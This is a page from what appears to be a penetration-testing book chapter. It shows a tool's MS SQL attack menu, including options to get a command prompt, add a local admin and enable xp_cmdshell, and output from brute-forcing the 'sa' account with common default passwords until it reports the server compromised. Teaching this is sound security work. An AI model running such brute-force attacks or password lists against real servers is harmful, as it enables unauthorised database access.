background image


Chapter 11

You can use and customize several options to reach your target, the easi-

est of which is the quick brute force, which will often go undetected. We’ll 
select the quick brute force option using a subset of built-in passwords and 
attempt to guess the password on the MS SQL server.

Enter the IP Address and Port Number to Attack.


Options: (a)ttempt SQL Ping and Auto Quick Brute Force

           (m)ass scan and dictionary brute
           (s)ingle Target (Attack a Single Target with big dictionary)
           (f)ind SQL Ports (SQL Ping)
           (i) want a command prompt and know which system is vulnerable
           (v)ulnerable system, I want to add a local admin on the box...
           (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)

  Enter Option: 


 Enter username for SQL database (example:sa): 


Configuration file not detected, running default path.
Recommend running install to configure Fast-Track.
Setting default directory...

 Enter the IP Range to scan for SQL Scan (example

Do you want to perform advanced SQL server identification on non-standard SQL 
ports? This will use UDP footprinting in order to determine where the SQL 
servers are at. This could take quite a long time.

 Do you want to perform advanced identification, yes or no: 


[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP
Brute forcing password of  on IP
Brute forcing password of password on IP

SQL Server Compromised: "sa" with password of: "password" on IP

Brute forcing password of sqlserver on IP
Brute forcing password of sql on IP
Brute forcing password of password1 on IP
Brute forcing password of password123 on IP
Brute forcing password of complexpassword on IP
Brute forcing password of database on IP
Brute forcing password of server on IP
Brute forcing password of changeme on IP
Brute forcing password of change on IP
Brute forcing password of sqlserver2000 on IP
Brute forcing password of sqlserver2005 on IP